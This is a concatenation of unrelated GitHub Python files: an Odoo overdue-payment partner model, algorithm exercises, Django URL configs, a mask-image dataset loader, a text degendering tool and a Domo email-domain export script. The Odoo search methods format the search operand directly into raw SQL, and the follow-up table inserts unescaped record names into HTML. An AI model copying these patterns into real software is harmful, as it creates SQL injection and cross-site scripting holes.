self.env.user.company_id.id\n if not self.env['account.move.line'].search([\n ('partner_id', '=', self.ids[0]),\n ('account_id.user_type_id.type', '=', 'receivable'),\n ('full_reconcile_id', '=', False),\n ('company_id', '=', company_id),\n '|', ('date_maturity', '=', False),\n ('date_maturity', '<=', fields.Date.today()),\n ]):\n raise UserError(_('Error! \\nThe partner does not have any '\n 'accounting entries to print in the overdue '\n 'report for the current company.'))\n self.message_post(body=_('Printed overdue payments report'))\n wizard_partner_ids = [self.ids[0] * 10000 + company_id]\n followup_ids = self.env['payment.followup'].search(\n [('company_id', '=', company_id)])\n if not followup_ids:\n raise UserError(_('Error! \\nThere is no followup plan '\n 'defined for the current company.'))\n data = {\n 'date': fields.date.today(),\n 'payment_followup_id': followup_ids[0] and followup_ids[0].id,\n }\n return self.env['res.partner'].browse(\n wizard_partner_ids)._get_partner_fup_report_print(data)\n\n @api.multi\n def send_overdue_mail(self):\n\n context = self.env.context.copy()\n context['followup'] = True\n mtp = self.env['mail.template']\n unknown_mails = 0\n template = 'payment_followup.email_template_payment_followup_default'\n for partner in self:\n partners_to_email = [child for child in partner.child_ids if\n child.type == 'invoice' and child.email]\n if not partners_to_email and partner.email:\n partners_to_email = [partner]\n if partners_to_email:\n level = partner.wo_legal_process_followup_line_id\n for partner_to_email in partners_to_email:\n if level and level.reminder_mail and \\\n level.template_id and \\\n level.template_id.id:\n level.template_id.with_context(context).send_mail(\n partner_to_email.id)\n else:\n template_id = self.env.ref(template).id\n mtp.browse(template_id).send_mail(\n partner_to_email.id)\n if partner not in partners_to_email:\n partner.message_post(body=_(\n 'Overdue email sent to %s' % ', '.join(\n ['%s <%s>' % (partner.name, partner.email)\n for partner in partners_to_email])))\n else:\n unknown_mails = unknown_mails + 1\n action_text = _(\"Email not sent because of email address of \"\n \"partner not filled in\")\n if partner.upcoming_activity_date:\n payment_action_date = min(\n fields.Date.today(),\n partner.upcoming_activity_date)\n else:\n payment_action_date = fields.Date.today()\n if partner.upcoming_activity:\n upcoming_activity = \\\n partner.upcoming_activity + \\\n \" \\n \" + action_text\n else:\n upcoming_activity = action_text\n partner.with_context(context).write({\n 'upcoming_activity_date': payment_action_date,\n 'upcoming_activity': upcoming_activity})\n return unknown_mails\n\n @api.multi\n def get_followup_details(self):\n self.ensure_one()\n payment_followup_print = \\\n self.env['report.payment_followup.report_payment_followup']\n assert len(self.ids) == 1\n partner = self.commercial_partner_id\n followup_table = ''\n if partner.move_line_ids:\n company = self.env.user.company_id\n current_date = fields.Date.today()\n final_res = payment_followup_print._get_related_move_lines(\n partner, company.id)\n\n for currency_dict in final_res:\n currency = currency_dict.get(\n 'line', [{\n 'currency_id': company.currency_id\n }])[0]['currency_id']\n followup_table += '''\n <table border=\"2\" width=100%>\n <tr>\n <td>''' + _(\"Invoice Date\") + '''</td>\n <td>''' + _(\"Description\") + '''</td>\n <td>''' + _(\"Reference\") + '''</td>\n <td>''' + _(\"Due Date\") + '''</td>\n <td>''' + _(\"Amount\") + \" (%s)\" % (\n currency.symbol) + '''</td>\n <td>''' + _(\"Lit.\") + '''</td>\n </tr>\n '''\n total = 0\n for aml in currency_dict['line']:\n block = aml['blocked'] and 'X' or ' '\n total += aml['amount_balance']\n strbegin = \"<TD>\"\n strend = \"</TD>\"\n date = aml['date_maturity'] or aml['date']\n if date <= current_date and aml['amount_balance'] > 0:\n strbegin = \"<TD><B>\"\n strend = \"</B></TD>\"\n followup_table += \\\n \"<TR>\" + strbegin + str(aml['date']) + \\\n strend + strbegin + aml['name'] + \\\n strend + strbegin + \\\n (aml['ref'] or '') + \\\n strend + strbegin + \\\n str(date) + strend + strbegin + str(aml['amount_balance']) + \\\n strend + strbegin + block + strend + \\\n \"</TR>\"\n\n total = reduce(lambda x, y: x + y['amount_balance'],\n currency_dict['line'], 0.00)\n\n total = formatLang(self.env, total, dp='Account',\n currency_obj=currency)\n followup_table += '''<tr> </tr>\n </table>\n <center>''' + \\\n _(\"Amount due\") + ''' : %s </center>\n 
''' % (total)\n return followup_table\n\n @api.multi\n def set_action_done(self):\n return self.write({\n 'upcoming_activity_date': False,\n 'upcoming_activity': '',\n 'payment_responsible_id': False})\n\n @api.multi\n def _search_payment_earliest_date(self, operator, operand):\n args = [('expected_payment_date', operator, operand)]\n company_id = self.env.user.company_id.id\n having_where_clause = ' AND '.join(\n map(lambda x: \"(MIN(l.date_maturity) %s '%%s')\" % (x[1]), args))\n having_values = [x[2] for x in args]\n having_where_clause = having_where_clause % (having_values[0])\n query = 'SELECT partner_id FROM account_move_line l ' \\\n 'WHERE account_id IN ' \\\n '(SELECT id FROM account_account ' \\\n 'WHERE user_type_id IN ' \\\n '(SELECT id FROM account_account_type ' \\\n 'WHERE type=\\'receivable\\')) AND l.company_id = %s ' \\\n 'AND l.full_reconcile_id IS NULL ' \\\n 'AND partner_id IS NOT NULL GROUP BY partner_id '\n query = query % (company_id)\n if having_where_clause:\n query += ' HAVING %s ' % (having_where_clause)\n self._cr.execute(query)\n res = self._cr.fetchall()\n if not res:\n return [('id', '=', '0')]\n return [('id', 'in', [x[0] for x in res])]\n\n @api.multi\n def _get_query(self, args, overdue_only=False):\n company_id = self.env.user.company_id.id\n having_where_clause = ' AND '.join(\n map(lambda x: '(SUM(bal2) %s %%s)' % (x[1]), args))\n having_values = [x[2] for x in args]\n having_where_clause = having_where_clause % (having_values[0])\n overdue_only_str = overdue_only and 'AND date_maturity <= NOW()' or ''\n return ('''SELECT pid AS partner_id, SUM(bal2) FROM\n (SELECT CASE WHEN bal IS NOT NULL THEN bal\n ELSE 0.0 END AS bal2, p.id as pid FROM\n (SELECT (debit-credit) AS bal, partner_id\n FROM account_move_line l\n WHERE account_id IN\n (SELECT id FROM account_account\n WHERE user_type_id IN (SELECT id\n FROM account_account_type\n WHERE type=\\'receivable\\'\n ))\n %s AND full_reconcile_id IS NULL\n AND company_id = %s) AS l\n RIGHT JOIN res_partner p\n ON p.id = partner_id ) AS pl\n GROUP BY pid HAVING %s''') % (\n overdue_only_str, company_id, having_where_clause)\n\n @api.multi\n def _search_amount_due(self, operator, operand):\n args = [('amt_tobe_paid', operator, operand)]\n query = self._get_query(\n args, overdue_only=False)\n self._cr.execute(query)\n res = self._cr.fetchall()\n if not res:\n return [('id', '=', '0')]\n return [('id', 'in', [x[0] for x in res])]\n\n @api.multi\n def _search_amount_overdue(self, operator, operand):\n args = [('overdue_amt', operator, operand)]\n query = self._get_query(\n args, overdue_only=True)\n self._cr.execute(query)\n res = self._cr.fetchall()\n if not res:\n return [('id', '=', '0')]\n return [('id', 'in', [x[0] for x in res])]\n\n move_line_ids = fields.One2many(\n 'account.move.line', 'partner_id', string='Move Lines',\n domain=[('full_reconcile_id', '=', False),\n ('account_id.user_type_id.type', '=', 'receivable')])\n comment = fields.Text('Comments',\n track_visibility=\"onchange\", copy=False)\n user_id = fields.Many2one(\n 'res.users', ondelete='set null', string='User',\n track_visibility=\"onchange\", copy=False)\n upcoming_activity = fields.Text(\n 'Schedule Action', copy=False, track_visibility=\"onchange\")\n upcoming_activity_date = fields.Date(\n 'Upcoming Activity Date', copy=False)\n followup_line_id = fields.Many2one(\n 'payment.followup.line',\n compute='_compute_latest_fup_details',\n string=\"Follow-up Line\")\n followup_date = fields.Date(\n compute='_compute_latest_fup_details',\n 
string=\"Latest Payment Follow-up Date\")\n wo_legal_process_followup_line_id = fields.Many2one(\n 'payment.followup.line',\n compute='_compute_latest_fup_details',\n string=\"Follow-up Line w/o Legal Process\")\n expected_payment_date = fields.Date(\n compute='_compute_payment_rel_details', string=\"Payment Expected Date\",\n search='_search_payment_earliest_date')\n amt_tobe_paid = fields.Float(\n compute='_compute_payment_rel_details', string=\"Amount to be Paid\",\n store=False, search='_search_amount_due')\n overdue_amt = fields.Float(\n compute='_compute_payment_rel_details', string=\"Overdue Amount\",\n search='_search_amount_overdue')\n\n @api.multi\n def open_follow_ups(self):\n form_view = self.env.ref(\n 'payment_followup.view_res_partner_form')\n return {\n 'name': _('Follow Ups'),\n 'res_model': 'res.partner',\n 'res_id': self.id,\n 'views': [(form_view.id, 'form'), ],\n 'type': 'ir.actions.act_window',\n }\n","repo_name":"gagaboy/odoo10_plus","sub_path":"addons/payment_followup/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":17661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72958152833","text":"\"\"\"\n给定两个整数数组 preorder 和 inorder ,其中 preorder 是二叉树的先序遍历, inorder 是同一棵树的中序遍历,请构造二叉树并返回其根节点。\n\n来源:力扣(LeetCode)\n链接:https://leetcode.cn/problems/construct-binary-tree-from-preorder-and-inorder-traversal\n著作权归领扣网络所有。商业转载请联系官方授��,非商业转载请注明出处。\n\"\"\"\n# Definition for a binary tree node.\nfrom typing import List\nfrom typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n \"\"\"\n 递归\n 前序数组中的第一个元素即为二叉树的根节点,根据该元素切割中序数组,得到左序数组和右中序数组\n 中序数组和后续数据原始大小相等,可以根据切割后的中序数组切割后序数组,再得到前序数组中的第一个元素\n (再继续之前的步骤)\n :param preorder:\n :param inorder:\n :return:\n \"\"\"\n if not preorder:\n return\n\n pre = preorder[0]\n root_index = inorder.index(pre)\n root = TreeNode(pre)\n\n # 切割中序数组\n inorder_left = inorder[:root_index]\n inorder_right = inorder[root_index + 1 :]\n\n # 切割前序数组\n pre_left = preorder[1 : len(inorder_left) + 1]\n pre_right = preorder[len(inorder_left) + 1 :]\n\n root.left = self.buildTree(pre_left, inorder_left)\n root.right = self.buildTree(pre_right, inorder_right)\n\n return root\n\n\n# preorder = [3,9,20,15,7], inorder = [9,3,15,20,7]\n","repo_name":"SsuperL/leetcode-practice","sub_path":"medium/exercise_105.py","file_name":"exercise_105.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72583785475","text":"#!/usr/bin/env python\n# coding:utf8\n\"\"\"\n@Time : 2019/11/14\n@Author : fls\n@Contact : fls@darkripples.com\n@Desc : darkripples-对外api\n\n@Modify Time @Author @Version @Desciption\n------------ ------- -------- -----------\n2019/11/14 08:12 fls 1.0 create\n\"\"\"\n\nfrom django.urls import path\n\napp_name = 'app_dr_ifs'\n\nurlpatterns = [\n]\n","repo_name":"darkripples/django_mouldle_project","sub_path":"app_dr/ifs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70576693955","text":"from collections import deque \n\nclass Solution: \n @staticmethod\n def numIslands_bfs(grid): #bfs is iteratove\n if not grid:\n return 0\n \n islands = 
0\n visited = set()\n rows, cols = len(grid), len(grid[0])\n\n def bfs(r, c):\n q = deque()\n visited.add((r, c))\n q.append((r, c))\n\n while q:\n row, col = q.popleft()\n directions = [[-1, 0], [1, 0], [0, 1], [0, -1]]\n\n for dr, dc in directions:\n r, c = row + dr, col + dc\n\n if ((r) in range(rows) \n and (c) in range(cols)\n and grid[r][c] == \"1\" \n and (r, c) not in visited):\n q.append((r, c))\n visited.add((r, c))\n\n for r in range(rows):\n for c in range(cols):\n if grid[r][c] == \"1\" and (r, c) not in visited:\n bfs(r, c)\n islands += 1\n\n return islands\n \n @staticmethod\n def numIslands_dfs(grid):\n if not grid or not grid[0]:\n return 0\n\n islands = 0\n visited = set()\n rows, cols = len(grid), len(grid[0])\n\n def dfs(r, c):\n if (\n r not in range(rows)\n or c not in range(cols)\n or grid[r][c] == \"0\"\n or (r, c) in visited\n ):\n return\n\n visited.add((r, c))\n directions = [[0, 1], [0, -1], [1, 0], [-1, 0]]\n for dr, dc in directions:\n dfs(r + dr, c + dc)\n\n for r in range(rows):\n for c in range(cols):\n if grid[r][c] == \"1\" and (r, c) not in visited:\n islands += 1\n dfs(r, c)\n return islands\n\nclass Test:\n grid = [\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n ]\n @classmethod\n def test_solution(cls):\n assert Solution.numIslands_bfs(cls.grid) == 1\n assert Solution.numIslands_dfs(cls.grid) == 1\n print(\"Both Test success\")\n\nTest.test_solution()\n \n \n","repo_name":"akashsonowal/ml-foundations","sub_path":"ml_foundations/ops_utils/coding_toolkit/data_structures_and_algorithms/graphs/number_of_islands.py","file_name":"number_of_islands.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"44234076387","text":"def findRange(nums):\n pos_fim = 0\n for i in range(1, len(nums)):\n if nums[i] < nums[i-1]:\n pos_fim = i\n break\n\n ref = nums[pos_fim]\n pos_ini = 0\n for i in range(pos_fim):\n if nums[i] > ref:\n pos_ini = i-1\n break\n\n return nums[pos_ini], nums[pos_fim]\n\n\nif __name__ == '__main__':\n print(findRange([1, 7, 9, 5, 7, 8, 10]))\n # (1, 5)\n\n","repo_name":"silvioedu/TechSeries-Daily-Interview","sub_path":"day55/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9972261929","text":"\"\"\"\nHere, we create a custom dataset\n\"\"\"\nimport torch\n\nfrom utils.types import PathT\nfrom torch.utils.data import Dataset\nfrom typing import Any, Tuple\nfrom PIL import Image\nimport glob\nimport ast\nfrom torchvision import transforms\n\n\nclass MaskDataset(Dataset):\n \"\"\"\n Mask dataset. 
contains the images, the bounding box and the label\n \"\"\"\n\n def __init__(self, path: PathT) -> None:\n # Set variables\n self.folder_path = path\n\n # Load features\n self.image_list = self._get_features()\n\n def __getitem__(self, index: int) -> Tuple:\n \"\"\"\n :return: image, bounding box, label, shape\n \"\"\"\n return self.image_list[index][0], self.image_list[index][1], self.image_list[index][2], self.image_list[index][\n 3], self.image_list[index][4]\n\n def __len__(self) -> int:\n \"\"\"\n :return: the length of the dataset (number of sample).\n \"\"\"\n return len(self.image_list)\n\n def _get_features(self) -> Any:\n \"\"\"\n :return: list of lists with the features of the images,\n [[image1, bounding box1, label1, shape1],[image2, bounding box2, label2, shape2],...] as values\n \"\"\"\n\n image_list = []\n for filename in glob.glob(self.folder_path + '/*.jpg'):\n im = Image.open(filename)\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n normalize, ])\n\n # extracting bb, label and shape\n closer_location = filename.find(']') + 1\n opener_location = filename.find('[')\n bounding_box = torch.tensor(ast.literal_eval(filename[opener_location:closer_location]),\n requires_grad=False, dtype=torch.int32)\n shape = torch.tensor(im.size, requires_grad=False, dtype=torch.int32)\n label = torch.tensor(ast.literal_eval(filename[closer_location + 2:-4]), requires_grad=False,\n dtype=torch.float32)\n image = transform(im.copy())\n\n # scaling the shape of the bounding box to [0,1] scale\n relative_bb = self.scale_bb(bounding_box, shape)\n image_list.append([image, relative_bb, label, shape, filename])\n im.close()\n return image_list\n\n @staticmethod\n def scale_bb(bounding_box, shape):\n \"\"\"\n\n :param bounding_box: location of the bounding box\n :param shape: original shape of the image\n :return: scales version of the bounding box\n \"\"\"\n rel_x = bounding_box[0] / shape[0]\n rel_y = bounding_box[1] / shape[1]\n rel_width = bounding_box[2] / shape[0]\n rel_height = bounding_box[3] / shape[1]\n return torch.tensor([rel_x, rel_y, rel_width, rel_height], requires_grad=False, dtype=torch.float32)","repo_name":"ariel-berger/Mask_Identification","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13899301471","text":"'''\nExercício 2: Estenda a classe Stack , que escrevemos durante as explicações do\nconteúdo, para que ela suporte um limite de itens dentro da pilha. 
Se\ndefinirmos que a pilha deve ter o tamanho dois, ela não poderá ter três itens.\n'''\n\nfrom stack import Stack\n\n\nclass LimitStack(Stack):\n def __init__(self, limit):\n super().__init__()\n self.limit = limit\n\n def push(self, value):\n if self.size() < self.limit:\n self._data.append(value)\n else:\n raise 'StackOverflow'\n\n\ncontent_stack = LimitStack(2)\ncontent_stack.push(1)\ncontent_stack.push(-2)\ncontent_stack.push(3)\n","repo_name":"vanderson-henrique/trybe-exercises","sub_path":"COMPUTER-SCIENCE/BLOCO_39/39_3/conteudo/exercicio2.py","file_name":"exercicio2.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"28747275765","text":"from django.urls import path\nfrom blog import views\n\n# list urls\nurlpatterns = [\n path('', views.PostIndexView.as_view(), name='post-index'),\n path('', views.PostDetailView.as_view(), name='post-detail'),\n path('page/', views.PageDetailView.as_view(), name='page-detail'),\n path('category/', views.CategoryIndexView.as_view(), name='category-index'),\n path('/', views.PostMonthlyArchiveView.as_view(), name='monthly-post-archive')\n]\n","repo_name":"satujamsaja/django-blog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73936574274","text":"\"\"\"\nThis is where the degendering takes place.\n\"\"\"\nimport regex\nimport sys\nimport random\nimport json\nfrom timeit import default_timer as timer\nfrom librarian import get_book_text, is_string\nfrom reference_library import NB_NAMES, NB_NAMES_MODERN, NB_NAMES_BY_DECADE, ALL_NAMES\nfrom reference_library import BOY_NAMES, GIRL_NAMES, ALL_PRONOUNS\nfrom reference_library import COMMON_WORDS, WARNING_WORDS, MALE_PRONOUN_DICT, FEMALE_PRONOUN_DICT\nfrom utilities import lazy_shuffle, sorted_by_values, get_min_diff, lazy_shuffle_keys, drop_low\n\nDEFAULT_PARAMETERS = {\n 'male' : 'nb',\n 'female' : 'nb',\n 'year' : 1960,\n 'name matches' : {},\n 'name choices' : 20\n }\n\n#Temporary values used to debug an optimization issue\nbook_timer = 0\nsoup_timer = 0\n\ndef get_pronoun_list():\n male_pronouns = [key for key in MALE_PRONOUN_DICT]\n female_pronouns = [key for key in FEMALE_PRONOUN_DICT]\n pronoun_list = male_pronouns + female_pronouns\n return pronoun_list\n\ndef get_suggestion(name_list, names_used):\n #print(f'Used names: {names_used}')\n available_names = [name for name in name_list if not name in names_used]\n #print(f'Available names: {available_names}')\n if available_names:\n selection = random.choice(available_names)\n #print(f'Selected name: {selection}')\n return selection\n else:\n selection = random.choice(name_list)\n #print(f'Selected name: {selection}')\n return selection\n \ndef suggest_name(gender, names_used):\n if gender == 'nb':\n return get_suggestion(NB_NAMES, names_used)\n elif gender == 'f':\n return get_suggestion(GIRL_NAMES, names_used)\n elif gender == 'm':\n return get_suggestion(BOY_NAMES, names_used)\n else:\n return ''\n \ndef fill_defaults(parameters):\n for key in DEFAULT_PARAMETERS:\n if key not in parameters:\n parameters[key] = DEFAULT_PARAMETERS[key]\n return parameters\n\ndef fix_text(text):\n \"\"\" Various substitutions to fix problems created by the fact\n we check pronouns one at a time \"\"\"\n text = regex.sub(r'àéà', '', text)\n text = regex.sub(r'His/Him/Hers', 'Her/Hers', text)\n text = 
regex.sub(r'Their/Them/Hers', 'Her/Hers', text)\n text = regex.sub(r'Their/Hers', 'Her/Hers', text)\n text = regex.sub(r'their/hers', 'her/hers', text)\n text = regex.sub(r'his/him/hers', 'her/hers', text)\n text = regex.sub(r'their/them/hers', 'her/hers', text)\n return text\n \ndef degender_text(text, parameters):\n start = timer()\n original_text = text\n match_dict = parameters['match dict']\n for key in match_dict:\n key_dict = match_dict[key]\n text = regex.sub(key_dict['pattern'], key_dict['replacement'], text)\n end = timer()\n global book_timer\n book_timer += (end-start)\n global soup_timer\n soup_timer += (end-start)\n return fix_text(text)\n\n\ndef degender_text_box(text, parameters):\n parameters = fill_defaults(parameters)\n pronoun_dict = create_pronoun_dict(parameters)\n name_dict = create_name_dict(parameters)\n match_dict = {**pronoun_dict, **name_dict}\n parameters['match dict'] = match_dict\n return degender_text(text, parameters)\n\ndef degender_all(item, parameters):\n if is_string(item):\n new_string = degender_text(item, parameters)\n if new_string:\n item.replace_with(new_string)\n else: \n try:\n for child in item.contents:\n degender_all(child, parameters)\n except AttributeError:\n pass\n\ndef create_pronoun_dict(parameters):\n pronoun_dict = {}\n if parameters['male'] == 'nb':\n male_index = 0\n elif parameters['male'] == 'f':\n male_index = 1\n else:\n male_index = -1\n if parameters['female'] == 'nb':\n female_index = 0\n elif parameters['female'] == 'm':\n female_index = 1\n else:\n female_index = -1\n for tup in [(MALE_PRONOUN_DICT,male_index),(FEMALE_PRONOUN_DICT,female_index)]:\n index = tup[1]\n reference_dict = tup[0]\n if index >= 0:\n for pronoun in reference_dict:\n match = reference_dict[pronoun][index]\n pronoun_dict[pronoun] = {'match':match,\n 'pattern':regex.compile(r'\\b' + pronoun + r'\\b'),\n 'replacement': match + 'àéà'}\n pronoun_dict[pronoun.title()] = {'match':match.title(),\n 'pattern':regex.compile(r'\\b' + pronoun.title()\n + r'\\b'),\n 'replacement': match.title() + 'àéà'}\n pronoun_dict[pronoun.upper()] = {'match':match.upper(),\n 'pattern':regex.compile(r'\\b' + pronoun.upper()\n + r'\\b'),\n 'replacement': match.upper() + 'àéà'}\n return pronoun_dict\n\ndef create_name_dict(parameters):\n name_matches = parameters['name matches']\n name_dict = {}\n for name in name_matches:\n match = name_matches[name]\n name_dict[name] = {'match':match,\n 'pattern':regex.compile(r'\\b' + name + r'\\b'),\n 'replacement': match + 'àéà'}\n name_dict[name.upper()] = {'match':match.upper(),\n 'pattern':regex.compile(r'\\b' + name.upper() + r'\\b'),\n 'replacement': match.upper() + 'àéà'}\n return name_dict\n \ndef degender_book(book_soup, parameters = DEFAULT_PARAMETERS):\n parameters = fill_defaults(parameters)\n pronoun_dict = create_pronoun_dict(parameters)\n name_dict = create_name_dict(parameters)\n match_dict = {**pronoun_dict, **name_dict}\n #print(f'match_dict: {match_dict}')\n parameters['match dict'] = match_dict\n with open('reference/test_match_dict.json', 'w') as json_file:\n json_dict = {}\n for key in match_dict:\n json_dict[key] = match_dict[key]['match']\n json.dump(json_dict, json_file)\n for soup in book_soup:\n global soup_timer\n degender_all(soup, parameters)\n print(f'Degendering times for soup: {soup_timer} seconds')\n soup_timer = 0\n print(f'Degendering times for book {book_timer} seconds:')\n\"\"\" \ndef get_text_dict(text):\n word_list = regex.sub(r'[^\\p{Latin}]',' ',text).split()\n name_list = [word for word in word_list 
if word in ALL_NAMES]\n name_dict = {}\n for name in name_list:\n if name in name_dict:\n name_dict[name] += 1\n else:\n name_dict[name] = 1\n return name_dict\n\ndef get_text_names(text):\n pattern = r'(?= 5}\n return short_name_dict\n name_tuple_list = []\n for key, value in sorted(short_name_dict.items(), key = lambda x: x[1], reverse=True):\n name_tuple_list.append((key,value))\n return name_tuple_list\n\ndef split_clean_warning_dict(count_dict):\n warning_dict = {}\n clean_dict = {}\n for key, count in count_dict.items():\n if key in WARNING_WORDS:\n warning_dict[key] = count\n else:\n clean_dict[key] = count\n return (clean_dict, warning_dict)\n\ndef combine_dicts(count_dicts):\n combined_dict = {}\n for count_dict in count_dicts:\n for key, count in count_dict.items():\n combined_dict[key] = combined_dict.get(key, 0) + count\n return combined_dict\n\ndef get_names(text):\n known_name_dict = get_known_names(text)\n potential_name_dict = get_potential_names(text)\n temp_tuple = split_clean_warning_dict(known_name_dict)\n known_name_dict = temp_tuple[0]\n warning_name_dict = temp_tuple[1]\n known_names = []\n for key, value in sorted(known_name_dict.items(), key = lambda x: x[1], reverse=True):\n known_names.append(key)\n potential_name_dict = combine_dicts([potential_name_dict, warning_name_dict])\n for key in [key for (key, value) in potential_name_dict.items()]:\n if key in known_names:\n del potential_name_dict[key]\n potential_names = []\n for key, value in sorted(potential_name_dict.items(), key = lambda x: x[1], reverse=True):\n potential_names.append(key)\n return (known_names, potential_names)\n\ndef get_book_names(book_soup):\n book_text = get_book_text(book_soup)\n name_tuple = get_names(book_text)\n return name_tuple\n","repo_name":"JimmyLamothe/Degenderer","sub_path":"degenderer.py","file_name":"degenderer.py","file_ext":"py","file_size_in_byte":11177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2925427705","text":"import pandas as pd\nimport numpy as np\nimport os\nimport pathlib\nimport subprocess\nimport json\nimport requests\nimport logging\nfrom common import helper\nfrom datetime import datetime\nimport re\nimport csv\n\n\n\n# ==== global vars\nregex = r'\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,7}\\b'\nusername = \"\"\npassword = \"\"\ninstances_ref = \"inst_client_creds.csv\"\nexport_csv_ref = 'domain_list.csv'\nexport_data = pd.DataFrame()\nno_dataset = 30\nocc = \"=\" * 30\nlast_no_days = 3\ndataset_limit = 10000\ndataset_offset = 0\ninst_df_id = {}\nstd_list = ['Users [U][1] [Latest Metadata]']\n# ==== global vars\n\n# ===================== common ======================\ndef relative_path():\n return os.path.dirname(os.path.realpath(__import__(\"__main__\").__file__))\n\ndef check(email):\n if(re.fullmatch(regex, email)):\n return True\n else:\n return False\n\ndef fetch_all_emails(instance, session, client, dataset_id, ds_name, owner):\n dataset_offset=0\n loop_bool = True\n while loop_bool:\n\n dataset_payload = {\"querySource\":\"data_table\",\"useCache\":True,\n \"query\":{\n \"columns\":[{\"exprType\":\"COLUMN\",\"column\":\"Email\"}],\n \"limit\":{\"limit\": dataset_limit,\"offset\": dataset_offset},\n \"orderByColumns\":[],\"groupByColumns\":[],\n \"where\":{\"not\":False,\"exprType\":\"IN\",\n \"leftExpr\":{\"exprType\":\"COLUMN\",\"column\":\"User Account Status\"},\n \"selectSet\":[{\"exprType\":\"STRING_VALUE\",\"value\":\"active\"}]},\n \"having\":None},\n 
\"context\":{\"calendar\":\"StandardCalendar\",\n \"features\":{\"PerformTimeZoneConversion\":True,\"AllowNullValues\":True,\"TreatNumbersAsStrings\":True}},\"viewTemplate\":None}\n\n df_list = helper.export_dataset(instance, session, dataset_payload, dataset_id)\n\n data = [{\n 'domain': a[0][a[0].index('@') + 1 : ],\n 'ds_name': ds_name,\n 'client': client,\n 'instance_id': instance,\n 'owner_id': owner.get('id'),\n 'owner_name': owner.get('name')\n }\n for a in df_list['rows']\n if a[0] !='' and a[0]!=None ]\n print('===============================emails===================== ',)\n # Creates DataFrame.\n\n export_data = pd.DataFrame(data)\n print(\"instance={} , client={}, dataset_id={}, ds_name={}, owner={}\".format(instance, client, dataset_id, ds_name, owner))\n export_data.to_csv(export_csv_ref, mode='a', index=False, header=False)\n \n dataset_offset +=dataset_limit\n loop_bool = not(df_list['numRows'] < dataset_limit)\n \n def find_std(n, is_bool=False):\n ns = re.sub(r\"^\\d+\", \"\", n) # removed all the number from the begining\n ns = re.sub(r\"^\\_+\", \"\", ns) # removed _ from the begining\n ns = re.sub(r\"^Glue_\", \"\", ns) # removed Glue_ from the begining\n ns = re.sub(r\"^Glue\", \"\", ns) # removed Glue_ from the begining\n ns = ns.lstrip(' ')\n if(ns in std_list):\n return True if is_bool else ''\n else:\n print('search string ns = ',ns)\n return False if is_bool else ns\n\ndef fetch_all_ds(instance, session, client, current_user_id):\n offset=0\n\n payload = {\n \"entities\":[\"DATASET\"],\n \"filters\":[\n {\"filterType\": \"dateBucket\", \"field\": \"last_updated\", \"value\": \"LAST_DAY\"},\n # {\"filterType\":\"term\",\"field\":\"owned_by_id\",\"value\":\"{}\".format(current_user_id),\"not\":False},\n {\"field\":\"name_sort\",\"filterType\":\"wildcard\",\"query\":\"*{}*\".format(std_list[0])}\n ],\n \"combineResults\":True,\"query\":\"*\",\n \"count\": no_dataset, \"offset\": offset,\n \"sort\":{\"isRelevance\":False,\"fieldSorts\":[{\"field\":\"create_date\",\"sortOrder\":\"DESC\"}]}\n }\n\n ds = helper.fetch_datasets(instance, session, payload)\n print(\"found {} datasets in the instance {}\".format(ds['_metaData']['totalCount'], instance))\n # print('dataSources == ',ds['dataSources'])\n for dataset in ds['dataSources']:\n print('ds.name = ', dataset.get('name',''))\n print('dataset id = ', dataset['id'])\n fetch_all_emails(instance, session, client, dataset['id'], dataset.get('name',''), \n dataset.get('owner',{'id':'','name':''}))\n\n\n# ===================== common ======================\n\n\n# ======================================================================================================================\nprint(occ,\"Starting script now == \", datetime.now().strftime(\"%d-%b-%Y %H:%M:%S\"), occ)\n\n\ninstance_info = pd.read_csv(relative_path() + '/' + instances_ref)\n\ninstance_info[['username']] = instance_info[['username']].fillna(value=username)\ninstance_info[['password']] = instance_info[['password']].fillna(value=password)\n\ncols = [\n 'domain',\n 'ds_name',\n 'client',\n 'instance_id',\n 'owner_id',\n 'owner_name'\n ]\ndf = pd.DataFrame(columns=cols)\n\ndf.to_csv(export_csv_ref, index=False, quoting=csv.QUOTE_NONE)\n\nfor i, instance in instance_info.iterrows():\n # login to the instance and get the token from helper.get_session_token\n inst_id = instance['instance_id']\n auth = helper.get_session_token(inst_id,\n instance['username'],\n instance['password'], True)\n\n session = auth['sessionToken']\n\n # log error if login fails\n if 
